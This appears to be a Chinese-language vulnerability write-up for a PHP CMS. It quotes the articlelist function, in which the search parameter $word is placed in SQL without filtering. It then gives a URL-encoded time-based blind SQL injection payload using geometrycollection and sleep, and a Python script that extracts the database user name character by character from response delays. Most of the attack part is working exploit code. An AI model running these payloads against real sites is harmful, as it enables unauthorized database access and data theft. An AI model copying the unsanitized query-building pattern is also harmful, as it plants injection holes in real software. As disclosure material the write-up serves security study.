延时注入,写代码受网速影响比较严重,网速不稳的话,可能误差比较大,当然,你可以适当把sleep数字搞大些,freebuf上面有一个转换成二进制,然后再开8个线程跑数据的思路,这里我就不写了。

在include/class_temp.php中

function articlelist($mark='',$ispage=true,$pagebtn=2,$auto=true,$bcat=0,$scat='',$lcat='',$size=0,$star=0,$word='',$order='',$searfie='title'){
 
    global $web,$tcz;
 
    if($mark=='special'){
 
        if(!$size)$size=$web['list_size'];
 
        $sql='select * from '.tabname('special_list').' where webid='.$web['id'].' and isdel=0 and special_id='.$tcz['id'].' order by dataid desc';
 
        $spelist=db_getpage($sql,$size,$tcz['page'],'',goif($web['mobiletemp'],'mobile'),$pagebtn);
 
        $list=array();
 
        $web['list_record']=$spelist['num'];
 
        $web['list_page']=$spelist['page'];
 
        foreach($spelist['list'] as $spe){
 
            $tname='article';
 
            if($spe['modtype']>10)$tname.='_'.$web['id'].'_'.$spe['modtype'];
 
            $art=db_getshow($tname,'*','webid='.$web['id'].' and isok=0 and dataid='.$spe['dataid']);
 
            array_push($list,$art);
 
            }
 
        return $list;
 
        }
 
    $order_text='xu desc,sort desc,time_add desc,dataid desc';
 
    if($order!='')$order_text=$order;
 
    $tname='article';
 
    $modtype=db_getone('module','modtype','webid='.$web['id'].goif($bcat,' and classid='.$bcat).goif($mark!='',' and mark="'.$mark.'"'));
 
    if($modtype>10)$tname.='_'.$web['id'].'_'.$modtype;
 
    $searsql='';
 
    $seartype='title';
 
    if($web['list_page']!='')$ispage=false;
 
    if($ispage){
 
        if($word=='')$word=$tcz['word'];
 
        if($word!=''){
 
            switch($tcz['seartype']){
 
                case 'date':
 
                    $t1=strtotime($word.' 00:00:00');
 
                    $t2=strtotime($word.' 23:59:59');
 
                    if(empty($t1)){
 
                        tipmsg('非法的搜索关键词:'.$word,true);
 
                        }
 
                    $searsql=' and time_add>='.$t1.' and time_add<='.$t2;
 
                break;
 
                default:
 
                    if($tcz['seartype']!=''){
 
                        if(strstr(','.$searfie.',',','.$tcz['seartype'].','))$seartype=$tcz['seartype'];
 
                        }
 
                    if(strstr($word,',')){
 
                        $wlist=explode(',',$word);
 
                        foreach($wlist as $w)$searsql.=goif($searsql!='',' or ').'LOCATE("'.$w.'",`'.$seartype.'`)>0';
 
                        $searsql=' and ('.$searsql.')';
 
                    }else $searsql=' and LOCATE("'.$word.'",`'.$seartype.'`)>0';
 
                break;
 
                }
 
            }
 
        if(!$size)$size=$web['list_size'];
 
        if(!$bcat&&$tcz['bcat']&&$mark==''&&$auto)$bcat=$tcz['bcat'];
 
        if($scat==''&&$tcz['scat']&&$auto)$scat=$tcz['scat'];
 
        if($lcat==''&&$tcz['lcat']&&$auto)$lcat=$tcz['lcat'];
 
        $sql='select *,if(time_top>'.time().',1,0) as xu from '.tabname($tname).' where webid='.$web['id'].' and isok=0 and '.goif($web['mobiletemp'],'mobile','computer').'=0 and languages="'.$web['templang'].'"'.goif($star,goif($star==9,' and star>0',' and star='.$star)).goif($mark!='',' and mark="'.$mark.'"').goif($bcat,' and bcat='.$bcat).goif($scat!='',' and scat in('.$scat.')').goif($lcat!='',' and lcat in('.$lcat.')').goif($searsql!='',$searsql).' order by '.$order_text;
 
        $list=db_getpage($sql,$size,$tcz['page'],'',goif($web['mobiletemp'],'mobile'),$pagebtn);
 
        $web['list_record']=$list['num'];
 
        $web['list_page']=$list['page'];
 
        return $list['list'];
 
    }else{
 
        $sql='select *,if(time_top>'.time().',1,0) as xu from '.tabname($tname).' where webid='.$web['id'].' and isok=0 and '.goif($web['mobiletemp'],'mobile','computer').'=0 and languages="'.$web['templang'].'"'.goif($star,goif($star==9,' and star>0',' and star='.$star)).goif($mark!='',' and mark="'.$mark.'"').goif($bcat,' and bcat='.$bcat).goif($scat!='',' and scat in('.$scat.')').goif($lcat!='',' and lcat in('.$lcat.')').goif($word!='',' and LOCATE("'.$word.'",`'.$seartype.'`)>0').' order by '.$order_text;
 
        $list=db_getlist($sql,$size);
 
        return $list;
 
        }
 
    }

其中变量$word过滤不得当,导致可以注入,测试了好多语句,最后别人给出的payload是延时注入,发现可以

漏洞验证:

http://127.0.0.1/?log=blog&seartype=title&word=%E9%9C%87%E6%92%BC%22%20and%20geometrycollection((select%20*from(select%20*%20from%20(select%20sleep%20(5))a)b))%20and%20%221%22=%221

效果页面延时5秒

写了个脚本:

#/usr/bin/python
#*-*coding=utf-8*-*
import requests
import time
 
session = requests.Session()
payloads = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789#$%^&*()-+=!@_.'
def httpGet(url):   
    global session
    try: 
        #print url
        timestart = time.time()
        session.get(url)
        times = time.time() - timestart
        #print times
    except Exception ,e:
        return 'timeout'
    return times
def getLength(url):#获取长度
    i = 0
    temp = url
    while True:
        urls = temp
        urls = urls + '" and geometrycollection((select *from(select * from (select sleep (case when (select length(user())='+str(i)+') then 5 else 0.1 end))a)b)) and "1"="1'
        htmlContent = httpGet(urls)
        print 'i-->' + str(i)
        if htmlContent > 5:          
            print '长度为' + str(i)
            return i
            break
        i += 1
def getUser(url,length):
    data = ''
    temp = url
    for i in range(1,length):
        for payload in payloads:
            urls = temp + '" and geometrycollection((select *from(select * from (select sleep ( ascii(mid(user()from( '+str(i)+' )for(1)))='+str(ord(payload))+' ))a)b)) and "1"="1'
            #print urls
            htmlContent = httpGet(urls)
            print "猜解中......."
            if htmlContent > 3:
                print payload
                data += payload
                break
    return data
 
 
 
if __name__ == '__main__':
    length = getLength('http://127.0.0.1/?log=blog&seartype=title&word=qq')
    getUser('http://127.0.0.1/?log=blog&seartype=title&word=qq',length)

140733xw3womc2o9zhiljz
141027i8l666858w66gzz5

By:wuyan